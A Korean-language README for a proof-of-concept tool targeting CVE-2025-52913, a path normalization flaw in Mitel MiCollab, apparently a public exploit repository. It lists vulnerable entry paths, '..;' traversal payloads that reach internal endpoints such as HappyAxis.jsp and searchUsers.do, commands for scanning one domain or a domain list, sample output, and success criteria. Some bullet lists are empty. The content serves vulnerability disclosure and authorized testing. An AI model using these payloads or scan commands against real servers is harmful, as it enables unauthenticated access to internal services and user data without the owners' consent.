
CVE-2025-52913에 대한 개념 증명(PoC)으로, Mitel MiCollab에 영향을 미치는 경로 정규화 취약점입니다.
이 저장소는 Mitel MiCollab에 영향을 미치는 경로 정규화 취약점인 CVE-2025-52913에 대한 개념 증명(PoC)을 포함하고 있습니다.
이 문제는 인증되지 않은 공격자가 ..;와 같은 조작된 URL 시퀀스를 활용하여 의도된 경로 제한을 우회하고 내부 애플리케이션 엔드포인트에 접근할 수 있도록 합니다.
성공적인 악용을 통해 다음이 가능할 수 있습니다:
다음 경로를 통해 취약점이 트리거될 수 있습니다:
/npm-pwg/loginForm.jsp/
/npm-pwg/extendedUmPlayMessage.jsp/
/npm-admin/showLoginPage.do/
/npm-admin/login.do/
예시 경로 이동 페이로드:
/..;/..;/axis2-AWC/axis2-web/HappyAxis.jsp
/..;/..;/usp/searchUsers.do
pip install -r requirements.txt
python3 POC-CVE-2025-52913.py example.com
python3 POC-CVE-2025-52913.py domains.txt
[*] Testing http://example.com
[+] http://example.com/npm-pwg/loginForm.jsp/..;/..;/axis2-AWC/axis2-web/HappyAxis.jsp - 200
[!] Possible success
대상이 취약할 가능성이 있는 조건:
서버가 HTTP 200으로 응답
응답에 다음이 포함:
Axis2Axis2 Happiness Page이 취약점은 ..;를 포함한 조작된 경로의 부적절한 정규화로 인해 발생하며, 의도된 애플리케이션 컨텍스트를 넘어서는 경로 이동이 가능합니다.
이 동작은 다음과 같은 내부 서비스를 노출할 수 있습니다:
Dahmani Toumi가 발견함
이 프로젝트는 교육 목적 및 승인된 보안 테스트 전용으로 제작되었습니다.
명시적 허가 없이 이 도구를 시스템에 사용하지 마십시오. 저자는 오용이나 손해에 대해 책임을 지지 않습니다.